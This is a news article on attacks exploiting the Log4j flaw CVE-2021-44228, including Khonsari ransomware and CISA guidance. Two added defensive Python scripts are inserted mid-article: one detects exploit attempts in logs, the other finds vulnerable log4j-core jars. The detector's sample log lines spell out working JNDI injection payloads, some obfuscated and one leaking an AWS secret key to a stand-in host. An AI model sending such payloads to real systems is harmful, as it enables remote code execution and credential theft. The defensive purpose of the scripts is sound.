Romanian cybersecurity company Bitdefender said on Monday that it has observed attempts to attack Windows machines with a new ransomware family called Khonsari, as well as the Orcus remote access Trojan, by exploiting the recently disclosed critical Log4j vulnerability.
The attack uses the remote code execution flaw to fetch an additional payload, a .NET binary, from a remote server. That binary encrypts the victim's files, appends the .khonsari extension to them, and displays a ransom note demanding a bitcoin payment in exchange for restoring access.
The vulnerability is tracked as CVE-2021-44228 and is also known as Log4Shell or LogJam (not to be confused with the 2015 TLS Diffie-Hellman downgrade attack of the same name). Simply put, an attacker who can get a crafted JNDI lookup string into anything the application logs, such as an HTTP header or a form field, can make the affected system connect to a server the attacker controls and load and run the code it returns, giving the attacker a foothold on servers inside corporate networks.
Log4j is an open-source Java logging library maintained by the non-profit Apache Software Foundation. With roughly 475,000 downloads of its GitHub project, it is widely used to record application events and is also bundled into other frameworks such as Elasticsearch, Kafka and Flink, which in turn underpin many websites and popular Internet services.
The disclosure comes as the US Cybersecurity and Infrastructure Security Agency (CISA) raised the alarm over active, widespread exploitation of the flaw, which, if left unaddressed, could grant attackers unfettered access and unleash a new round of cyberattacks, sending companies rushing to find and patch vulnerable machines.
“An attacker could exploit this vulnerability by submitting a specially crafted request to an affected system, causing that system to execute arbitrary code,” said guidance released by the agency on Monday. “The request allows an attacker to take full control of the system. An attacker could then steal information, launch Khonsari ransomware, or perform other malicious actions.”
CISA also added the Log4j vulnerability to its Known Exploited Vulnerabilities catalogue, giving federal agencies a December 24 deadline to patch it. Similar guidance has been issued by government agencies in Austria, Canada, New Zealand and the United Kingdom.
Active exploitation attempts recorded in the wild so far include abusing the flaw to rope devices into a botnet and to drop additional payloads such as Cobalt Strike and cryptocurrency miners. Cybersecurity firm Sophos said it has also observed attempts to exfiltrate Amazon Web Services keys and other private data.
In a sign of how fast the threat is evolving, Check Point researchers warned that 60 new variants of the original Log4j exploit appeared in less than 24 hours, adding that the company had blocked more than 845,000 intrusion attempts, with 46% of the attacks carried out by known malicious groups.
The vast majority of Log4Shell exploitation attempts originated in Russia (4,275), according to Kaspersky telemetry, followed by Brazil (2,493), the United States (1,746), Germany (1,336), Mexico (1,177), Italy (1,094), France (1,008) and Iran (976). By comparison, only 351 attempts were recorded in China.
Alongside the exploit's rapidly mutating nature, the library's widespread use across industries has also put industrial control systems and the operational technology environments that run critical infrastructure on high alert.
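To make the "specially crafted request" and the rapid spread of exploit variants concrete for defenders, here is an added example (not code from the article or from any vendor named in it) of a small Python detector for HTTP access logs. It URL-decodes each line, collapses the nested-lookup obfuscations that Log4j evaluates (${lower:j}, ${upper:n}, ${::-l}, ${env:NOPE:-j}) and then flags any ${jndi:<scheme>:...} lookup, also noting when a lookup inside the JNDI URL would leak local data such as environment variables. The log lines, hosts and addresses are constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article). Lines 1-2 carry
# plain JNDI lookups in the User-Agent and the query string, line 3 uses the
# nested-lookup obfuscation seen in later exploit variants, line 4 is
# URL-encoded, line 5 tries to leak an environment variable through the LDAP
# URL, and line 6 is benign traffic. Addresses are documentation ranges.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [13/Dec/2021:10:01:30 +0000] "GET /login?user=${jndi:rmi://203.0.113.9/x} '
    'HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.7 - - [13/Dec/2021:10:02:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}${::-d}ap://203.0.113.9/o}"',
    '10.0.0.8 - - [13/Dec/2021:10:02:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D '
    'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:02:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9/${env:AWS_SECRET_ACCESS_KEY}}"',
    '10.0.0.10 - - [13/Dec/2021:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: a body with no further $, { or } in it.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup followed by its URL scheme (ldap, ldaps, rmi, dns, iiop, ...).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)
# Lookups that read local data; inside a JNDI URL they turn a probe into exfiltration.
LEAK_RE = re.compile(r"\$\{\s*(env|sys|java)\s*:", re.IGNORECASE)


def _resolve(match) -> str:
    """Evaluate one innermost lookup the way Log4j's Interpolator does for the
    obfuscation forms attackers use; anything else is frozen as a marker so the
    rewrite loop terminates."""
    body = match.group(1)
    head, _, rest = body.partition(":")
    key = head.strip().lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body:  # ${::-j}, ${env:NOPE:-j}: an undefined lookup yields its default
        return body.split(":-", 1)[1]
    return "\x00{" + body + "}\x00"  # jndi:, env:, sys:, ... stay as they are


def normalize(text: str) -> str:
    """Collapse nested and obfuscated lookups until nothing changes, then restore
    the frozen markers to their ${...} form."""
    prev = None
    while prev != text:
        prev = text
        text = LOOKUP_RE.sub(_resolve, text)
    return text.replace("\x00{", "${").replace("\x00", "")


def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a log line carrying a JNDI lookup, else None."""
    normalized = normalize(unquote(line))
    hit = JNDI_RE.search(normalized)
    if not hit:
        return None
    return {
        "scheme": hit.group(1).lower(),
        "leaks_local_data": bool(LEAK_RE.search(normalized)),
        "normalized": normalized,
        "raw": line,
    }


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    return [hit for hit in map(scan_line, lines) if hit]


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG_LINES):
        flag = " (exfil)" if finding["leaks_local_data"] else ""
        print(f"{finding['scheme']}{flag}: {finding['normalized']}")
```

A plain substring match for `${jndi:` would miss lines 3 and 4, which is exactly the evasion the reported variants rely on. The normalisation covers only the lookup forms named in the code, so treat it as a detection aid rather than a complete emulator; run it over access, proxy and WAF logs (headers get logged as well as URLs) and pair it with alerts on outbound LDAP and RMI connections from application servers, which a successful exploit needs.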
“Log4j is widely used in external/Internet-facing and internal applications that control and monitor manufacturing processes, leaving many industrial operations, such as electricity, water, food and beverage, manufacturing and others, exposed to potential remote exploitation and access,” said Sergio Caltagirone, vice president of threat intelligence at Dragos. “It is important to prioritize external and Internet-facing applications over internal applications because of their Internet exposure, although both are vulnerable.”
The development further highlights how critical security flaws in open-source software can pose a significant threat to organizations that pull such common dependencies into their IT systems. Beyond its broad reach, Log4Shell is all the more worrisome because of its relative ease of exploitation, laying the groundwork for further ransomware attacks.
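Finding which deployments actually bundle the vulnerable dependency is the first step of the "find and fix" scramble described above. As an added example (not code from the article, CISA, Bitdefender or the Log4j project), the Python script below walks a directory tree, opens every .jar/.war/.ear (they are zip files), descends into nested archives such as WEB-INF/lib/*.jar inside a .war, reads the bundled log4j-core version from its Maven pom.properties and checks whether JndiLookup.class is still present. Apache's fix release for CVE-2021-44228 was 2.15.0, and deleting JndiLookup.class from log4j-core was Apache's documented mitigation where an upgrade was not immediately possible, so an older version with the class present is reported as affected. The demo() helper builds constructed fixture archives in a temporary directory; the file names, versions and placeholder class bytes are all made up for the example.

```python
import io
import os
import re
import shutil
import tempfile
import zipfile
from typing import Dict, List, Tuple

# Entry paths inside a log4j-core jar: the lookup class behind CVE-2021-44228
# and the Maven metadata that records the bundled version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)  # Apache's fix release for CVE-2021-44228
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0): only leading digits count."""
    nums = []
    for part in text.split(".")[:3]:
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    return tuple(nums + [0] * (3 - len(nums)))


def _version_from_props(data: bytes) -> str:
    for line in data.decode("utf-8", "replace").splitlines():
        if line.strip().startswith("version="):
            return line.strip().split("=", 1)[1].strip()
    return "unknown"


def inspect_archive(data: bytes, label: str, findings: List[Dict], depth: int = 0) -> None:
    """Record any log4j-core in this archive, then recurse into nested archives."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with archive:
        names = set(archive.namelist())
        if JNDI_CLASS in names or POM_PROPS in names:
            version = _version_from_props(archive.read(POM_PROPS)) if POM_PROPS in names else "unknown"
            findings.append({"path": label, "version": version, "jndi_lookup_present": JNDI_CLASS in names})
        if depth < 3:  # war -> jar -> jar is as deep as real deployments go
            for inner in sorted(names):
                if inner.lower().endswith(ARCHIVE_SUFFIXES):
                    inspect_archive(archive.read(inner), f"{label}!{inner}", findings, depth + 1)


def is_affected(finding: Dict) -> bool:
    """Affected = JndiLookup still on the classpath and (if known) version below the fix."""
    if not finding["jndi_lookup_present"]:
        return False  # class removed: Apache's documented mitigation for older releases
    if finding["version"] == "unknown":
        return True  # cannot prove it is fixed; treat as affected until checked by hand
    return parse_version(finding["version"]) < FIXED_VERSION


def scan_tree(root: str) -> List[Dict]:
    findings: List[Dict] = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), path, findings)
    return findings


def _fake_log4j_core(version: str, keep_jndi_class: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar: real entry paths, placeholder contents."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if keep_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class file
    return buf.getvalue()


def build_demo_tree(root: str) -> None:
    """Constructed layout: three loose jars under lib/ and a .war bundling the old jar."""
    lib, webapps = os.path.join(root, "lib"), os.path.join(root, "webapps")
    os.makedirs(lib)
    os.makedirs(webapps)
    jars = {
        "log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1"),
        "log4j-core-2.14.1-stripped.jar": _fake_log4j_core("2.14.1", keep_jndi_class=False),
        "log4j-core-2.17.1.jar": _fake_log4j_core("2.17.1"),
    }
    for name, data in jars.items():
        with open(os.path.join(lib, name), "wb") as fh:
            fh.write(data)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
    with open(os.path.join(webapps, "app.war"), "wb") as fh:
        fh.write(buf.getvalue())


def demo() -> Dict[str, List]:
    """Build the fixture tree in a temp dir, scan it, return findings and affected paths."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    try:
        build_demo_tree(root)
        findings = scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return {"findings": findings, "affected": [f["path"] for f in findings if is_affected(f)]}


if __name__ == "__main__":
    for f in demo()["findings"]:
        print("AFFECTED" if is_affected(f) else "ok      ", f["version"], f["path"])
```

For a real host, call scan_tree() on the application and library roots instead of demo(). Later Log4j CVEs pushed Apache's recommended floor above 2.15.0, so treat the version check as a lower bound and keep the JndiLookup.class check as the decisive signal. The script will not see log4j-core copies that have been shaded into another jar under a different package prefix, nor those inside running container images, so pair it with build manifests and image inventories.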
“To be clear, this vulnerability poses a serious risk,” said CISA director Jen Easterly. “This vulnerability, which is widely exploited by a growing circle of attackers, is an urgent problem for network defenders given its widespread occurrence. Vendors must also communicate with their customers to ensure that end users are aware that their product contains this vulnerability and must prioritize software updates.”